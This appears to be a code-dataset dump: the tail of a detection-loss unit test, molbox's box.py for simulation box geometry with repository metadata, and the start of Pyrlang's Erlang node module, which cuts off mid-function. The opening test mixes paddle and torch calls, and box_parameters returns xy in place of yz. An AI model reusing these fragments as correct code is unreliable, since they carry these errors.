paddle.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
for i in range(len(self.anchor_generator.strides))
]
cls_scores, bbox_preds = self.forward(feat)
gt_bboxes = [paddle.empty((0, 4))]
gt_labels = [torch.LongTensor([])]
gt_bboxes_ignore = None
empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
empty_cls_loss = sum(empty_gt_losses['loss_cls'])
empty_box_loss = sum(empty_gt_losses['loss_bbox'])
assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
assert empty_box_loss.item() == 0, (
'there should be no box loss when there are no true boxes')
gt_bboxes = [
torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
]
gt_labels = [torch.LongTensor([2])]
one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
img_metas, gt_bboxes_ignore)
onegt_cls_loss = sum(one_gt_losses['loss_cls'])
onegt_box_loss = sum(one_gt_losses['loss_bbox'])
assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
| true | true |
1c3056485d96010aa6fa7acc377a2f817a61f3c8 | 14,477 | py | Python | molbox/box.py | daico007/molbox | 0cd18b1400ef1b0e1b5331b92aeb36af3465d425 | [
"MIT"
] | 2 | 2021-06-29T16:37:24.000Z | 2021-09-15T23:18:35.000Z | molbox/box.py | daico007/molbox | 0cd18b1400ef1b0e1b5331b92aeb36af3465d425 | [
"MIT"
] | 2 | 2021-06-29T16:41:07.000Z | 2021-07-01T14:41:49.000Z | molbox/box.py | daico007/molbox | 0cd18b1400ef1b0e1b5331b92aeb36af3465d425 | [
"MIT"
] | 2 | 2021-06-28T20:57:59.000Z | 2021-06-29T16:37:28.000Z | """generic box module."""
from warnings import warn
import numpy as np
__all__ = ["Box", "BoxError"]
class BoxError(Exception):
"""Exception to be raised when there's an error in Box methods"""
class Box(object):
"""A box representing the bounds of the system.
Parameters
----------
lengths : list-like, shape=(3,), dtype=float
Lengths of the edges of the box.
angles : list-like, shape=(3,), dtype=float, default=None
Angles (in degrees) that define the tilt of the edges of the box. If
None is given, angles are assumed to be [90.0, 90.0, 90.0]. These are
also known as alpha, beta, gamma in the crystallography community.
precision : int, optional, default=None
Control the precision of the floating point representation of box
attributes. If none provided, the default is 6 decimals.
Attributes
----------
vectors : np.ndarray, shape=(3,3), dtype=float
Vectors that define the parallelepiped (Box).
lengths : tuple, shape=(3,), dtype=float
Lengths of the box in x,y,z
angles : tuple, shape=(3,), dtype=float
Angles defining the tilt of the box.
Lx : float
Length of the Box in the x dimension
Ly : float
Length of the Box in the y dimension
Lz : float
Length of the Box in the z dimension
xy : float
Tilt factor needed to displace an orthogonal box's xy face to its
parallelepiped structure.
xz : float
Tilt factor needed to displace an orthogonal box's xz face to its
parallelepiped structure.
yz : float
Tilt factor needed to displace an orthogonal box's yz face to its
parallelepiped structure.
precision : int
Precision of the floating point numbers when accessing values.
Notes
-----
Box vectors are expected to be provided in row-major format.
"""
def __init__(self, lengths, angles=None, precision=None):
if precision is not None:
self._precision = int(precision)
else:
self._precision = 6
if angles is None:
angles = [90.0, 90.0, 90.0]
self._vectors = _lengths_angles_to_vectors(
lengths=lengths, angles=angles, precision=self.precision
)
(Lx, Ly, Lz, xy, xz, yz) = self._from_vecs_to_lengths_tilt_factors()
self._Lx = Lx
self._Ly = Ly
self._Lz = Lz
self._xy = xy
self._xz = xz
self._yz = yz
@classmethod
def from_lengths_angles(cls, lengths, angles, precision=None):
"""Generate a box from lengths and angles."""
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_uvec_lengths(cls, uvec, lengths, precision=None):
"""Generate a box from unit vectors and lengths."""
uvec = np.asarray(uvec)
uvec.reshape(3, 3)
if not np.allclose(np.linalg.norm(uvec, axis=1), 1.0):
raise BoxError(
"Unit vector magnitudes provided are not close to 1.0, "
f"magnitudes: {np.linalg.norm(uvec, axis=1)}"
)
lengths = np.asarray(lengths)
lengths.reshape(1, 3)
_validate_box_vectors(uvec)
scaled_vec = (uvec.T * lengths).T
(alpha, beta, gamma) = _calc_angles(scaled_vec)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_mins_maxs_angles(cls, mins, maxs, angles, precision=None):
"""Generate a box from min/max distance calculations and angles."""
(x_min, y_min, z_min) = mins
(x_max, y_max, z_max) = maxs
lengths = (x_max - x_min, y_max - y_min, z_max - z_min)
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_vectors(cls, vectors, precision=None):
"""Generate a box from box vectors."""
vectors = _validate_box_vectors(vectors)
(alpha, beta, gamma) = _calc_angles(vectors)
v1 = vectors[0, :]
v2 = vectors[1, :]
v3 = vectors[2, :]
Lx = np.linalg.norm(v1)
Ly = np.linalg.norm(v2)
Lz = np.linalg.norm(v3)
lengths = (Lx, Ly, Lz)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_lengths_tilt_factors(
cls, lengths, tilt_factors=None, precision=None
):
"""Generate a box from box lengths and tilt factors."""
(Lx, Ly, Lz) = lengths
if tilt_factors is None:
(xy, xz, yz) = (0.0, 0.0, 0.0)
else:
(xy, xz, yz) = tilt_factors
vecs = np.asarray(
[[Lx, 0.0, 0.0], [Ly * xy, Ly, 0.0], [Lz * xz, Lz * yz, Lz]]
)
(alpha, beta, gamma) = _calc_angles(vecs)
return cls(
lengths=lengths, angles=[alpha, beta, gamma], precision=precision
)
@classmethod
def from_lo_hi_tilt_factors(cls, lo, hi, tilt_factors, precision=None):
"""Generate a box from a lo, hi convention and tilt factors."""
(xlo, ylo, zlo) = lo
(xhi, yhi, zhi) = hi
(xy, xz, yz) = tilt_factors
xlo_bound = xlo + min([0.0, xy, xz, xy + xz])
xhi_bound = xhi + max([0.0, xy, xz, xy + xz])
ylo_bound = ylo + min([0.0, yz])
yhi_bound = yhi + max([0.0, yz])
lengths = [xhi_bound - xlo_bound, yhi_bound - ylo_bound, zhi - zlo]
return cls.from_lengths_tilt_factors(
lengths=lengths, tilt_factors=tilt_factors
)
@property
def vectors(self):
"""Box representation as a 3x3 matrix."""
return self._vectors
@property
def box_parameters(self):
"""Lengths and tilt factors of the box."""
return self.Lx, self.Ly, self.Lz, self.xy, self.xz, self.xy
@property
def Lx(self):
"""Length in the x direction."""
return round(self._Lx, self.precision)
@property
def Ly(self):
"""Length in the y direction."""
return round(self._Ly, self.precision)
@property
def Lz(self):
"""Length in the z direction."""
return round(self._Lz, self.precision)
@property
def lengths(self):
"""Lengths of the box."""
return self.Lx, self.Ly, self.Lz
@property
def xy(self):
"""Tilt factor xy of the box."""
return round(self._xy, self.precision)
@property
def xz(self):
"""Tilt factor xz of the box."""
return round(self._xz, self.precision)
@property
def yz(self):
"""Tilt factor yz of the box."""
return round(self._yz, self.precision)
@property
def tilt_factors(self):
"""Return the 3 tilt_factors (xy, xz, yz) of the box."""
return self.xy, self.xz, self.yz
@property
def angles(self):
"""Angles defining the tilt of the box (alpha, beta, gamma)."""
(alpha, beta, gamma) = self._get_angles()
alpha = round(alpha, self.precision)
beta = round(beta, self.precision)
gamma = round(gamma, self.precision)
return alpha, beta, gamma
@property
def precision(self):
"""Amount of decimals to represent floating point values."""
return self._precision
@precision.setter
def precision(self, value):
"""Decimal point precision, if None use 16, else cast as int."""
if not value:
precision = 16
else:
precision = int(value)
self._precision = precision
@property
def bravais_parameters(self):
"""Return the Box representation as Bravais lattice parameters.
Based on the box vectors, return the parameters to describe the box in
terms of the Bravais lattice parameters:
a,b,c = the edges of the Box
alpha, beta, gamma = angles(tilt) of the parallelepiped, in degrees
Returns
-------
parameters : tuple of floats,
(a, b, c, alpha, beta, gamma)
"""
(alpha, beta, gamma) = self.angles
(Lx, Ly, Lz) = self.lengths
return Lx, Ly, Lz, alpha, beta, gamma
def __repr__(self):
"""Return a string representation of the box."""
(Lx, Ly, Lz, xy, xz, yz) = self.box_parameters
format_precision = f".{self._precision}f" if self._precision else ""
desc = (
f"Box: Lx={Lx:{format_precision}}, "
f"Ly={Ly:{format_precision}}, "
f"Lz={Lz:{format_precision}}, "
f"xy={xy:{format_precision}}, "
f"xz={xz:{format_precision}}, "
f"yz={yz:{format_precision}}, "
)
return desc
def _from_vecs_to_lengths_tilt_factors(self):
# vectors should already be aligned by _normalize_box
v = np.zeros((3, 3))
v[0, :] = self._vectors[0, :]
v[1, :] = self._vectors[1, :]
v[2, :] = self._vectors[2, :]
Lx = np.sqrt(np.dot(v[0], v[0]))
a2x = np.dot(v[0], v[1]) / Lx
Ly = np.sqrt(np.dot(v[1], v[1]) - a2x * a2x)
xy = a2x / Ly
v0xv1 = np.cross(v[0], v[1])
v0xv1mag = np.sqrt(np.dot(v0xv1, v0xv1))
Lz = np.dot(v[2], v0xv1) / v0xv1mag
a3x = np.dot(v[0], v[2]) / Lx
xz = a3x / Lz
yz = (np.dot(v[1], v[2]) - a2x * a3x) / (Ly * Lz)
len_x = np.sqrt(np.dot(v[0], v[0]))
len_y = np.sqrt(np.dot(v[1], v[1]))
len_z = np.sqrt(np.dot(v[2], v[2]))
return len_x, len_y, len_z, xy, xz, yz
def _get_angles(self):
return _calc_angles(self.vectors)
def _validate_box_vectors(box_vectors):
"""Determine if the vectors are in the convention we use.
This method will parse the provided box vectors, determine if the vectors
follow the conventions the Box class adheres to. In this case:
1. It is a 3x3 matrix that can be coerced into a numpy array of floats
2. Vectors are in a right-handed basis (determinant of matrix is +)
3. The first vector is aligned along the [1,0,0] direction
4. The second vector in aligned along the xy plane
5. The third vector can align freely in the x,y, and +z direction
If the vectors are not right-handed, a warning will be raised, and the
vectors will be transformed into the right-handed coordinate system.
If the three vectors are not following conventions 3-5, the matrix will be
transformed to comply with them, and will also raise a warning.
"""
vecs = np.asarray(box_vectors, dtype=np.float64)
vecs.reshape(3, 3)
return _normalize_box(vecs)
def _lengths_angles_to_vectors(lengths, angles, precision):
(a, b, c) = lengths
(alpha, beta, gamma) = np.deg2rad(angles)
cos_a = np.clip(np.cos(alpha), -1.0, 1.0)
cos_b = np.clip(np.cos(beta), -1.0, 1.0)
cos_g = np.clip(np.cos(gamma), -1.0, 1.0)
sin_a = np.clip(np.sin(alpha), -1.0, 1.0)
sin_b = np.clip(np.sin(beta), -1.0, 1.0)
sin_g = np.clip(np.sin(gamma), -1.0, 1.0)
a_vec = np.asarray([a, 0.0, 0.0])
b_x = b * cos_g
b_y = b * sin_g
b_vec = np.asarray([b_x, b_y, 0.0])
c_x = c * cos_b
c_cos_y_term = (cos_a - (cos_b * cos_g)) / sin_g
c_y = c * c_cos_y_term
c_z = c * np.sqrt(1 - np.square(cos_b) - np.square(c_cos_y_term))
c_vec = np.asarray([c_x, c_y, c_z])
box_vectors = np.asarray((a_vec, b_vec, c_vec))
box_vectors.reshape(3, 3)
_validate_box_vectors(box_vectors=box_vectors)
return box_vectors.round(precision)
def _normalize_box(vectors):
"""Align the box matrix into a right-handed coordinate frame.
NOTE: This assumes that the matrix is in a row-major format.
NOTE: Inspiration and logic are from the Glotzer group package, Garnett;
which is provided under a BSD 3-clause License.
For additional information, refer to the License file provided with this
package.
"""
det = np.linalg.det(vectors)
if np.isclose(det, 0.0, atol=1e-5):
raise BoxError(
"The vectors to define the box are co-linear, this does not form a "
f"3D region in space.\n Box vectors evaluated: {vectors}"
)
if det < 0.0:
warn(
"Box vectors provided for a left-handed basis, these will be "
"transformed into a right-handed basis automatically."
)
# transpose to column-major for the time being
Q, R = np.linalg.qr(vectors.T)
# left or right handed: det<0 left, >0, right
sign = np.linalg.det(Q)
R = R * sign
signs = np.diag(
np.diag(np.where(R < 0, -np.ones(R.shape), np.ones(R.shape)))
)
transformed_vecs = R.dot(signs)
return _reduced_form_vectors(transformed_vecs.T)
def _reduced_form_vectors(box_vectors):
"""Get reduced vectors from vectors.
Adapted from HOOMD-Blue's documentation on periodic boundary conditions:
https://hoomd-blue.readthedocs.io/en/stable/box.html
"""
v1 = box_vectors[0, :]
v2 = box_vectors[1, :]
v3 = box_vectors[2, :]
lx = np.linalg.norm(v1)
a_2x = np.dot(v1, v2) / lx
ly = np.sqrt(np.dot(v2, v2) - a_2x * a_2x)
xy = a_2x / ly
v1_x_v2 = np.cross(v1, v2)
lz = np.dot(v3, (v1_x_v2 / np.linalg.norm(v1_x_v2)))
a_3x = np.dot(v1, v3) / lx
xz = a_3x / lz
yz = (np.dot(v2, v3) - a_2x * a_3x) / (ly * lz)
reduced_vecs = np.asarray(
[[lx, 0.0, 0.0], [xy * ly, ly, 0.0], [xz * lz, yz * lz, lz]]
)
return reduced_vecs
def _calc_angles(vectors):
"""Calculate the angles between the vectors that define the box.
Calculates the angles alpha, beta, and gamma from the Box object
attribute box_vectors, rounded to 'precision' number of decimal points.
"""
vector_magnitudes = np.linalg.norm(vectors, axis=1)
v = np.zeros((3, 3))
v[0, :] = vectors[0, :]
v[1, :] = vectors[1, :]
v[2, :] = vectors[2, :]
a_dot_b = np.dot(vectors[0], vectors[1])
b_dot_c = np.dot(vectors[1], vectors[2])
a_dot_c = np.dot(vectors[0], vectors[2])
alpha_raw = b_dot_c / (vector_magnitudes[1] * vector_magnitudes[2])
beta_raw = a_dot_c / (vector_magnitudes[0] * vector_magnitudes[2])
gamma_raw = a_dot_b / (vector_magnitudes[0] * vector_magnitudes[1])
(alpha, beta, gamma) = np.rad2deg(
np.arccos(np.clip([alpha_raw, beta_raw, gamma_raw], -1.0, 1.0))
)
return alpha, beta, gamma
| 32.977221 | 80 | 0.599641 | from warnings import warn
import numpy as np
__all__ = ["Box", "BoxError"]
class BoxError(Exception):
class Box(object):
def __init__(self, lengths, angles=None, precision=None):
if precision is not None:
self._precision = int(precision)
else:
self._precision = 6
if angles is None:
angles = [90.0, 90.0, 90.0]
self._vectors = _lengths_angles_to_vectors(
lengths=lengths, angles=angles, precision=self.precision
)
(Lx, Ly, Lz, xy, xz, yz) = self._from_vecs_to_lengths_tilt_factors()
self._Lx = Lx
self._Ly = Ly
self._Lz = Lz
self._xy = xy
self._xz = xz
self._yz = yz
@classmethod
def from_lengths_angles(cls, lengths, angles, precision=None):
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_uvec_lengths(cls, uvec, lengths, precision=None):
uvec = np.asarray(uvec)
uvec.reshape(3, 3)
if not np.allclose(np.linalg.norm(uvec, axis=1), 1.0):
raise BoxError(
"Unit vector magnitudes provided are not close to 1.0, "
f"magnitudes: {np.linalg.norm(uvec, axis=1)}"
)
lengths = np.asarray(lengths)
lengths.reshape(1, 3)
_validate_box_vectors(uvec)
scaled_vec = (uvec.T * lengths).T
(alpha, beta, gamma) = _calc_angles(scaled_vec)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_mins_maxs_angles(cls, mins, maxs, angles, precision=None):
(x_min, y_min, z_min) = mins
(x_max, y_max, z_max) = maxs
lengths = (x_max - x_min, y_max - y_min, z_max - z_min)
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_vectors(cls, vectors, precision=None):
vectors = _validate_box_vectors(vectors)
(alpha, beta, gamma) = _calc_angles(vectors)
v1 = vectors[0, :]
v2 = vectors[1, :]
v3 = vectors[2, :]
Lx = np.linalg.norm(v1)
Ly = np.linalg.norm(v2)
Lz = np.linalg.norm(v3)
lengths = (Lx, Ly, Lz)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_lengths_tilt_factors(
cls, lengths, tilt_factors=None, precision=None
):
(Lx, Ly, Lz) = lengths
if tilt_factors is None:
(xy, xz, yz) = (0.0, 0.0, 0.0)
else:
(xy, xz, yz) = tilt_factors
vecs = np.asarray(
[[Lx, 0.0, 0.0], [Ly * xy, Ly, 0.0], [Lz * xz, Lz * yz, Lz]]
)
(alpha, beta, gamma) = _calc_angles(vecs)
return cls(
lengths=lengths, angles=[alpha, beta, gamma], precision=precision
)
@classmethod
def from_lo_hi_tilt_factors(cls, lo, hi, tilt_factors, precision=None):
(xlo, ylo, zlo) = lo
(xhi, yhi, zhi) = hi
(xy, xz, yz) = tilt_factors
xlo_bound = xlo + min([0.0, xy, xz, xy + xz])
xhi_bound = xhi + max([0.0, xy, xz, xy + xz])
ylo_bound = ylo + min([0.0, yz])
yhi_bound = yhi + max([0.0, yz])
lengths = [xhi_bound - xlo_bound, yhi_bound - ylo_bound, zhi - zlo]
return cls.from_lengths_tilt_factors(
lengths=lengths, tilt_factors=tilt_factors
)
@property
def vectors(self):
return self._vectors
@property
def box_parameters(self):
return self.Lx, self.Ly, self.Lz, self.xy, self.xz, self.xy
@property
def Lx(self):
return round(self._Lx, self.precision)
@property
def Ly(self):
return round(self._Ly, self.precision)
@property
def Lz(self):
return round(self._Lz, self.precision)
@property
def lengths(self):
return self.Lx, self.Ly, self.Lz
@property
def xy(self):
return round(self._xy, self.precision)
@property
def xz(self):
return round(self._xz, self.precision)
@property
def yz(self):
return round(self._yz, self.precision)
@property
def tilt_factors(self):
return self.xy, self.xz, self.yz
@property
def angles(self):
(alpha, beta, gamma) = self._get_angles()
alpha = round(alpha, self.precision)
beta = round(beta, self.precision)
gamma = round(gamma, self.precision)
return alpha, beta, gamma
@property
def precision(self):
return self._precision
@precision.setter
def precision(self, value):
if not value:
precision = 16
else:
precision = int(value)
self._precision = precision
@property
def bravais_parameters(self):
(alpha, beta, gamma) = self.angles
(Lx, Ly, Lz) = self.lengths
return Lx, Ly, Lz, alpha, beta, gamma
def __repr__(self):
(Lx, Ly, Lz, xy, xz, yz) = self.box_parameters
format_precision = f".{self._precision}f" if self._precision else ""
desc = (
f"Box: Lx={Lx:{format_precision}}, "
f"Ly={Ly:{format_precision}}, "
f"Lz={Lz:{format_precision}}, "
f"xy={xy:{format_precision}}, "
f"xz={xz:{format_precision}}, "
f"yz={yz:{format_precision}}, "
)
return desc
def _from_vecs_to_lengths_tilt_factors(self):
v = np.zeros((3, 3))
v[0, :] = self._vectors[0, :]
v[1, :] = self._vectors[1, :]
v[2, :] = self._vectors[2, :]
Lx = np.sqrt(np.dot(v[0], v[0]))
a2x = np.dot(v[0], v[1]) / Lx
Ly = np.sqrt(np.dot(v[1], v[1]) - a2x * a2x)
xy = a2x / Ly
v0xv1 = np.cross(v[0], v[1])
v0xv1mag = np.sqrt(np.dot(v0xv1, v0xv1))
Lz = np.dot(v[2], v0xv1) / v0xv1mag
a3x = np.dot(v[0], v[2]) / Lx
xz = a3x / Lz
yz = (np.dot(v[1], v[2]) - a2x * a3x) / (Ly * Lz)
len_x = np.sqrt(np.dot(v[0], v[0]))
len_y = np.sqrt(np.dot(v[1], v[1]))
len_z = np.sqrt(np.dot(v[2], v[2]))
return len_x, len_y, len_z, xy, xz, yz
def _get_angles(self):
return _calc_angles(self.vectors)
def _validate_box_vectors(box_vectors):
vecs = np.asarray(box_vectors, dtype=np.float64)
vecs.reshape(3, 3)
return _normalize_box(vecs)
def _lengths_angles_to_vectors(lengths, angles, precision):
(a, b, c) = lengths
(alpha, beta, gamma) = np.deg2rad(angles)
cos_a = np.clip(np.cos(alpha), -1.0, 1.0)
cos_b = np.clip(np.cos(beta), -1.0, 1.0)
cos_g = np.clip(np.cos(gamma), -1.0, 1.0)
sin_a = np.clip(np.sin(alpha), -1.0, 1.0)
sin_b = np.clip(np.sin(beta), -1.0, 1.0)
sin_g = np.clip(np.sin(gamma), -1.0, 1.0)
a_vec = np.asarray([a, 0.0, 0.0])
b_x = b * cos_g
b_y = b * sin_g
b_vec = np.asarray([b_x, b_y, 0.0])
c_x = c * cos_b
c_cos_y_term = (cos_a - (cos_b * cos_g)) / sin_g
c_y = c * c_cos_y_term
c_z = c * np.sqrt(1 - np.square(cos_b) - np.square(c_cos_y_term))
c_vec = np.asarray([c_x, c_y, c_z])
box_vectors = np.asarray((a_vec, b_vec, c_vec))
box_vectors.reshape(3, 3)
_validate_box_vectors(box_vectors=box_vectors)
return box_vectors.round(precision)
def _normalize_box(vectors):
det = np.linalg.det(vectors)
if np.isclose(det, 0.0, atol=1e-5):
raise BoxError(
"The vectors to define the box are co-linear, this does not form a "
f"3D region in space.\n Box vectors evaluated: {vectors}"
)
if det < 0.0:
warn(
"Box vectors provided for a left-handed basis, these will be "
"transformed into a right-handed basis automatically."
)
Q, R = np.linalg.qr(vectors.T)
sign = np.linalg.det(Q)
R = R * sign
signs = np.diag(
np.diag(np.where(R < 0, -np.ones(R.shape), np.ones(R.shape)))
)
transformed_vecs = R.dot(signs)
return _reduced_form_vectors(transformed_vecs.T)
def _reduced_form_vectors(box_vectors):
v1 = box_vectors[0, :]
v2 = box_vectors[1, :]
v3 = box_vectors[2, :]
lx = np.linalg.norm(v1)
a_2x = np.dot(v1, v2) / lx
ly = np.sqrt(np.dot(v2, v2) - a_2x * a_2x)
xy = a_2x / ly
v1_x_v2 = np.cross(v1, v2)
lz = np.dot(v3, (v1_x_v2 / np.linalg.norm(v1_x_v2)))
a_3x = np.dot(v1, v3) / lx
xz = a_3x / lz
yz = (np.dot(v2, v3) - a_2x * a_3x) / (ly * lz)
reduced_vecs = np.asarray(
[[lx, 0.0, 0.0], [xy * ly, ly, 0.0], [xz * lz, yz * lz, lz]]
)
return reduced_vecs
def _calc_angles(vectors):
vector_magnitudes = np.linalg.norm(vectors, axis=1)
v = np.zeros((3, 3))
v[0, :] = vectors[0, :]
v[1, :] = vectors[1, :]
v[2, :] = vectors[2, :]
a_dot_b = np.dot(vectors[0], vectors[1])
b_dot_c = np.dot(vectors[1], vectors[2])
a_dot_c = np.dot(vectors[0], vectors[2])
alpha_raw = b_dot_c / (vector_magnitudes[1] * vector_magnitudes[2])
beta_raw = a_dot_c / (vector_magnitudes[0] * vector_magnitudes[2])
gamma_raw = a_dot_b / (vector_magnitudes[0] * vector_magnitudes[1])
(alpha, beta, gamma) = np.rad2deg(
np.arccos(np.clip([alpha_raw, beta_raw, gamma_raw], -1.0, 1.0))
)
return alpha, beta, gamma
| true | true |
1c30571b5d87ee2f1d181f41c63368ad40e3594c | 14,116 | py | Python | Pyrlang/node.py | s2hc-johan/Pyrlang | cd77f44b06677d313b241078282e4cb2bd7bd7a1 | [
"Apache-2.0"
] | null | null | null | Pyrlang/node.py | s2hc-johan/Pyrlang | cd77f44b06677d313b241078282e4cb2bd7bd7a1 | [
"Apache-2.0"
] | null | null | null | Pyrlang/node.py | s2hc-johan/Pyrlang | cd77f44b06677d313b241078282e4cb2bd7bd7a1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018, Erlang Solutions Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import gevent
from gevent import Greenlet
from typing import Dict, Union
from Pyrlang import logger, mailbox
from Pyrlang.Term import *
from Pyrlang.Dist.distribution import ErlangDistribution
from Pyrlang.Dist.node_opts import NodeOpts
from Pyrlang.process import Process
LOG = logger.tty
DEBUG = logger.nothing
WARN = logger.nothing
ERROR = logger.tty
class NodeException(Exception):
pass
class Node(Greenlet):
""" Implements an Erlang node which has a network name, a dictionary of
processes and registers itself via EPMD.
Node handles the networking asynchronously.
This is the root object of an Erlang node, it must be created first and
must outlive all other objects it manages, for them to be accessible
over the network.
Usage example:
1. Monkey patch with the help of Gevent: ``from gevent import monkey``
and then ``monkey.patch_all()``.
2. Create a node class with a name and a cookie
``node = Pyrlang.Node("py@127.0.0.1", "COOKIE")``
3. Start it with ``node.start()``
4. Now anything that you do (for example an infinite loop with
``gevent.sleep(1)`` in it, will give CPU time to the node.
.. note:: Node is a singleton, you can find the current node by
referencing ``Node.singleton``. This may change in future.
"""
singleton = None
""" Access this to find the current node. This may change in future. """
def __init__(self, name: str, cookie: str) -> None:
Greenlet.__init__(self)
if Node.singleton is not None:
raise NodeException("Singleton Node was already created")
Node.singleton = self
# Message queue based on ``gevent.Queue``. It is periodically checked
# in the ``_run`` method and the receive handler is called.
self.inbox_ = mailbox.Mailbox()
# An internal counter used to generate unique process ids
self.pid_counter_ = 0
# Process dictionary which stores all the existing ``Process`` objects
# adressable by a pid.
#
# .. note:: This creates a python reference to an
# object preventing its automatic garbage collection.
# In the end of its lifetime an object must be explicitly removed
# from this dictionary using ``Process.exit`` method on the
# process.
self.processes_ = {} # type: Dict[Pid, Process]
# Registered objects dictionary, which maps atoms to pids
self.reg_names_ = {} # type: Dict[Atom, Pid]
self.is_exiting_ = False
# An option object with feature support flags packed into an
# integer.
self.node_opts_ = NodeOpts(cookie=cookie)
# Node name as seen on the network. Use full node names here:
# ``name@hostname``
self.name_ = Atom(name)
self.dist_nodes_ = {} # type: Dict[str, Node]
self.dist_ = ErlangDistribution(node=self, name=name)
# This is important before we can begin spawning processes
# to get the correct node creation
self.dist_.connect(self)
# Spawn and register (automatically) the process 'rex' for remote
# execution, which takes 'rpc:call's from Erlang
from Pyrlang.rex import Rex
self.rex_ = Rex(self)
self.rex_.start()
# Spawn and register (automatically) the 'net_kernel' process which
# handles special ping messages
from Pyrlang.net_kernel import NetKernel
self.net_kernel_ = NetKernel(self)
self.net_kernel_.start()
def _run(self):
while not self.is_exiting_:
self.handle_inbox()
gevent.sleep(0.0)
def handle_inbox(self):
while True:
# Block, but then gevent will allow other green-threads to
# run, so rather than unnecessarily consuming CPU block
msg = self.inbox_.get()
# msg = self.inbox_.receive(filter_fn=lambda _: True)
if msg is None:
break
self.handle_one_inbox_message(msg)
def handle_one_inbox_message(self, m: tuple):
""" Handler is called whenever a message arrives to the mailbox.
"""
# Send a ('node_connected', NodeName, Connection) to inform about the
# connectivity with the other node
if m[0] == 'node_connected':
(_, addr, connection) = m
self.dist_nodes_[addr] = connection
# Send a ('node_disconnected', NodeName) to forget the connection
elif m[0] == 'node_disconnected':
(_, addr) = m
del self.dist_nodes_[addr]
def register_new_process(self, proc) -> Pid:
""" Generate a new pid and add the process to the process dictionary.
:type proc: Process or None
:param proc: A new process which needs a pid, or None if you only
need a fake pid
:return: A new pid (does not modify the process in place, so please
store the pid!)
"""
pid1 = Pid(node=self.name_,
id=self.pid_counter_ // 0x7fffffff,
serial=self.pid_counter_ % 0x7fffffff,
creation=self.dist_.creation_)
self.pid_counter_ += 1
if proc is not None:
self.processes_[pid1] = proc
return pid1
def on_exit_process(self, pid, reason):
LOG("Process %s exited with %s", pid, reason)
del self.processes_[pid]
def register_name(self, proc, name) -> None:
""" Add a name into registrations table (automatically removed when the
referenced process is removed)
:type proc: Process
:param proc: The process to register
:type name: Atom
:param name: The name to register with
"""
self.reg_names_[name] = proc.pid_
def stop(self) -> None:
""" Sets the mark that the node is done, closes connections.
"""
self.is_exiting_ = True
self.dist_.disconnect()
def where_is(self, ident) -> Union[Process, None]:
""" Look up a registered name or pid.
:rtype: Process or None
"""
if isinstance(ident, Atom) and ident in self.reg_names_:
ident = self.reg_names_[ident]
if isinstance(ident, Pid) and ident in self.processes_:
return self.processes_[ident]
return None
def _send_local_registered(self, receiver, message) -> None:
""" Try find a named process by atom key, drop a message into its inbox_
:param receiver: A name, atom, of the receiver process
:param message: The message
"""
if not isinstance(receiver, Atom):
raise NodeException("_send_local_registered receiver must be an "
"atom")
receiver_obj = self.where_is(receiver)
if receiver_obj is not None:
LOG("Node: send local reg=%s receiver=%s msg=%s" % (receiver, receiver_obj, message))
receiver_obj.inbox_.put(message)
else:
WARN("Node: send to unregistered name %s ignored" % receiver)
def _send_local(self, receiver, message) -> None:
""" Try find a process by pid and drop a message into its ``inbox_``.
:param receiver: Pid who will receive the message
:param message: The message
"""
if not isinstance(receiver, Pid):
raise NodeException("send's receiver must be a pid")
dst = self.where_is(receiver)
if dst is not None:
DEBUG("Node._send_local: pid %s <- %s" % (receiver, message))
dst.inbox_.put(message)
else:
WARN("Node._send_local: pid %s does not exist" % receiver)
def send(self, sender, receiver, message) -> None:
""" Deliver a message to a pid or to a registered name. The pid may be
located on another Erlang node.
:param sender: Message sender
:type sender: Pid
:type receiver: Pid or Atom or tuple[Atom, Pid or Atom]
:param receiver: Message receiver, a pid, or a name, or a tuple with
node name and a receiver on the remote node.
:param message: Any value which will be placed into the receiver
inbox. Pyrlang processes use tuples but that is not enforced
for your own processes.
"""
DEBUG("send -> %s: %s" % (receiver, message))
if isinstance(receiver, tuple):
(r_node, r_name) = receiver
if r_node == self.name_: # atom compare
# re-route locally
return self.send(sender, r_name, message)
else:
# route remotely
return self._send_remote(sender=sender,
dst_node=str(r_node),
receiver=r_name,
message=message)
if isinstance(receiver, Pid):
if receiver.is_local_to(self):
return self._send_local(receiver, message)
else:
return self._send_remote(sender=sender,
dst_node=str(receiver.node_),
receiver=receiver,
message=message)
if isinstance(receiver, Atom):
return self._send_local_registered(receiver, message)
raise NodeException("Don't know how to send to %s" % receiver)
def _send_remote(self, sender, dst_node: str, receiver, message) -> None:
DEBUG("Node._send_remote %s <- %s" % (receiver, message))
m = ('send', sender, receiver, message)
return self.dist_command(receiver_node=dst_node,
message=m)
def get_cookie(self):
""" Get string cookie value for this node.
TODO: Cookie per connection?
"""
return self.node_opts_.cookie_
def dist_command(self, receiver_node: str, message: tuple) -> None:
""" Locate the connection to the given node (a string).
Place a tuple crafted by the caller into message box for Erlang
distribution socket. It will pick up and handle the message whenever
possible.
:param receiver_node: Name of a remote node
:param message: A crafted tuple with command name and some more
values
"""
if receiver_node not in self.dist_nodes_:
LOG("Node: connect to node", receiver_node)
handler = self.dist_.connect_to_node(
